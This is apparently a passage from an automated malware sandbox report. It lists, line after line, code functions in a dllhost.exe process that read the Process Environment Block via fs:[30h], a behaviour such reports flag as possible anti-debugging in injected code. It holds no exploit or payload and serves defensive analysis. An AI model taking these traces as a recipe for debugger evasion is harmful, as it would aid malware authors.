Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03882349 mov eax, dword ptr fs:[00000030h] 11_2_03882349
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D5341 mov eax, dword ptr fs:[00000030h] 11_2_038D5341
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov eax, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov eax, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov eax, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov ecx, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov eax, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388035C mov eax, dword ptr fs:[00000030h] 11_2_0388035C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CA352 mov eax, dword ptr fs:[00000030h] 11_2_038CA352
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h] 11_2_037F8397
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h] 11_2_037F8397
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h] 11_2_037F8397
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF367 mov eax, dword ptr fs:[00000030h] 11_2_038BF367
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03807370 mov eax, dword ptr fs:[00000030h] 11_2_03807370
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03807370 mov eax, dword ptr fs:[00000030h] 11_2_03807370
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03807370 mov eax, dword ptr fs:[00000030h] 11_2_03807370
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038A437C mov eax, dword ptr fs:[00000030h] 11_2_038A437C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h] 11_2_037FE388
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h] 11_2_037FE388
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h] 11_2_037FE388
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383E284 mov eax, dword ptr fs:[00000030h] 11_2_0383E284
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383E284 mov eax, dword ptr fs:[00000030h] 11_2_0383E284
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03880283 mov eax, dword ptr fs:[00000030h] 11_2_03880283
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03880283 mov eax, dword ptr fs:[00000030h] 11_2_03880283
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03880283 mov eax, dword ptr fs:[00000030h] 11_2_03880283
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D5283 mov eax, dword ptr fs:[00000030h] 11_2_038D5283
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F826B mov eax, dword ptr fs:[00000030h] 11_2_037F826B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383329E mov eax, dword ptr fs:[00000030h] 11_2_0383329E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383329E mov eax, dword ptr fs:[00000030h] 11_2_0383329E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038102A0 mov eax, dword ptr fs:[00000030h] 11_2_038102A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038102A0 mov eax, dword ptr fs:[00000030h] 11_2_038102A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h] 11_2_038152A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h] 11_2_038152A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h] 11_2_038152A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h] 11_2_038152A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038972A0 mov eax, dword ptr fs:[00000030h] 11_2_038972A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038972A0 mov eax, dword ptr fs:[00000030h] 11_2_038972A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov ecx, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h] 11_2_038962A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h] 11_2_038C92A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h] 11_2_038C92A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h] 11_2_038C92A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h] 11_2_038C92A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA250 mov eax, dword ptr fs:[00000030h] 11_2_037FA250
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038892BC mov eax, dword ptr fs:[00000030h] 11_2_038892BC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038892BC mov eax, dword ptr fs:[00000030h] 11_2_038892BC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038892BC mov ecx, dword ptr fs:[00000030h] 11_2_038892BC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038892BC mov ecx, dword ptr fs:[00000030h] 11_2_038892BC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9240 mov eax, dword ptr fs:[00000030h] 11_2_037F9240
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9240 mov eax, dword ptr fs:[00000030h] 11_2_037F9240
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h] 11_2_0382B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h] 11_2_0380A2C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h] 11_2_0380A2C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h] 11_2_0380A2C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h] 11_2_0380A2C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h] 11_2_0380A2C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F823B mov eax, dword ptr fs:[00000030h] 11_2_037F823B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038092C5 mov eax, dword ptr fs:[00000030h] 11_2_038092C5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038092C5 mov eax, dword ptr fs:[00000030h] 11_2_038092C5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382F2D0 mov eax, dword ptr fs:[00000030h] 11_2_0382F2D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382F2D0 mov eax, dword ptr fs:[00000030h] 11_2_0382F2D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h] 11_2_038102E1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h] 11_2_038102E1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h] 11_2_038102E1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h] 11_2_038B12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D52E2 mov eax, dword ptr fs:[00000030h] 11_2_038D52E2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BF2F8 mov eax, dword ptr fs:[00000030h] 11_2_038BF2F8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F92FF mov eax, dword ptr fs:[00000030h] 11_2_037F92FF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03837208 mov eax, dword ptr fs:[00000030h] 11_2_03837208
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03837208 mov eax, dword ptr fs:[00000030h] 11_2_03837208
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D5227 mov eax, dword ptr fs:[00000030h] 11_2_038D5227
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h] 11_2_037FB2D3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h] 11_2_037FB2D3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h] 11_2_037FB2D3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03888243 mov eax, dword ptr fs:[00000030h] 11_2_03888243
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03888243 mov ecx, dword ptr fs:[00000030h] 11_2_03888243
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383724D mov eax, dword ptr fs:[00000030h] 11_2_0383724D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03806259 mov eax, dword ptr fs:[00000030h] 11_2_03806259
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BB256 mov eax, dword ptr fs:[00000030h] 11_2_038BB256
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BB256 mov eax, dword ptr fs:[00000030h] 11_2_038BB256
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03804260 mov eax, dword ptr fs:[00000030h] 11_2_03804260
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03804260 mov eax, dword ptr fs:[00000030h] 11_2_03804260
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03804260 mov eax, dword ptr fs:[00000030h] 11_2_03804260
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CD26B mov eax, dword ptr fs:[00000030h] 11_2_038CD26B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CD26B mov eax, dword ptr fs:[00000030h] 11_2_038CD26B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03841270 mov eax, dword ptr fs:[00000030h] 11_2_03841270
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03841270 mov eax, dword ptr fs:[00000030h] 11_2_03841270
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03829274 mov eax, dword ptr fs:[00000030h] 11_2_03829274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h] 11_2_038B0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03840185 mov eax, dword ptr fs:[00000030h] 11_2_03840185
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BC188 mov eax, dword ptr fs:[00000030h] 11_2_038BC188
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BC188 mov eax, dword ptr fs:[00000030h] 11_2_038BC188
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h] 11_2_037FF172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03857190 mov eax, dword ptr fs:[00000030h] 11_2_03857190
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388019F mov eax, dword ptr fs:[00000030h] 11_2_0388019F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388019F mov eax, dword ptr fs:[00000030h] 11_2_0388019F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388019F mov eax, dword ptr fs:[00000030h] 11_2_0388019F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388019F mov eax, dword ptr fs:[00000030h] 11_2_0388019F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FC156 mov eax, dword ptr fs:[00000030h] 11_2_037FC156
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h] 11_2_038B11A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h] 11_2_038B11A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h] 11_2_038B11A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h] 11_2_038B11A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381B1B0 mov eax, dword ptr fs:[00000030h] 11_2_0381B1B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h] 11_2_037F9148
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h] 11_2_037F9148
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h] 11_2_037F9148
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h] 11_2_037F9148
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D51CB mov eax, dword ptr fs:[00000030h] 11_2_038D51CB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h] 11_2_037FB136
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h] 11_2_037FB136
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h] 11_2_037FB136
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h] 11_2_037FB136
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C61C3 mov eax, dword ptr fs:[00000030h] 11_2_038C61C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C61C3 mov eax, dword ptr fs:[00000030h] 11_2_038C61C3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383D1D0 mov eax, dword ptr fs:[00000030h] 11_2_0383D1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383D1D0 mov ecx, dword ptr fs:[00000030h] 11_2_0383D1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h] 11_2_0387E1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h] 11_2_0387E1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E1D0 mov ecx, dword ptr fs:[00000030h] 11_2_0387E1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h] 11_2_0387E1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h] 11_2_0387E1D0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D61E5 mov eax, dword ptr fs:[00000030h] 11_2_038D61E5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038251EF mov eax, dword ptr fs:[00000030h] 11_2_038251EF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038051ED mov eax, dword ptr fs:[00000030h] 11_2_038051ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038A71F9 mov esi, dword ptr fs:[00000030h] 11_2_038A71F9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038301F8 mov eax, dword ptr fs:[00000030h] 11_2_038301F8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AA118 mov ecx, dword ptr fs:[00000030h] 11_2_038AA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h] 11_2_038AA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h] 11_2_038AA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h] 11_2_038AA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C0115 mov eax, dword ptr fs:[00000030h] 11_2_038C0115
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03830124 mov eax, dword ptr fs:[00000030h] 11_2_03830124
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03801131 mov eax, dword ptr fs:[00000030h] 11_2_03801131
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03801131 mov eax, dword ptr fs:[00000030h] 11_2_03801131
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03893140 mov eax, dword ptr fs:[00000030h] 11_2_03893140
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03893140 mov eax, dword ptr fs:[00000030h] 11_2_03893140
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03893140 mov eax, dword ptr fs:[00000030h] 11_2_03893140
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894144 mov eax, dword ptr fs:[00000030h] 11_2_03894144
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894144 mov eax, dword ptr fs:[00000030h] 11_2_03894144
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894144 mov ecx, dword ptr fs:[00000030h] 11_2_03894144
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894144 mov eax, dword ptr fs:[00000030h] 11_2_03894144
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894144 mov eax, dword ptr fs:[00000030h] 11_2_03894144
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03807152 mov eax, dword ptr fs:[00000030h] 11_2_03807152
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03806154 mov eax, dword ptr fs:[00000030h] 11_2_03806154
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03806154 mov eax, dword ptr fs:[00000030h] 11_2_03806154
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D5152 mov eax, dword ptr fs:[00000030h] 11_2_038D5152
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h] 11_2_037FA197
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h] 11_2_037FA197
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h] 11_2_037FA197
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03899179 mov eax, dword ptr fs:[00000030h] 11_2_03899179
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388D080 mov eax, dword ptr fs:[00000030h] 11_2_0388D080
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0388D080 mov eax, dword ptr fs:[00000030h] 11_2_0388D080
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380208A mov eax, dword ptr fs:[00000030h] 11_2_0380208A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382D090 mov eax, dword ptr fs:[00000030h] 11_2_0382D090
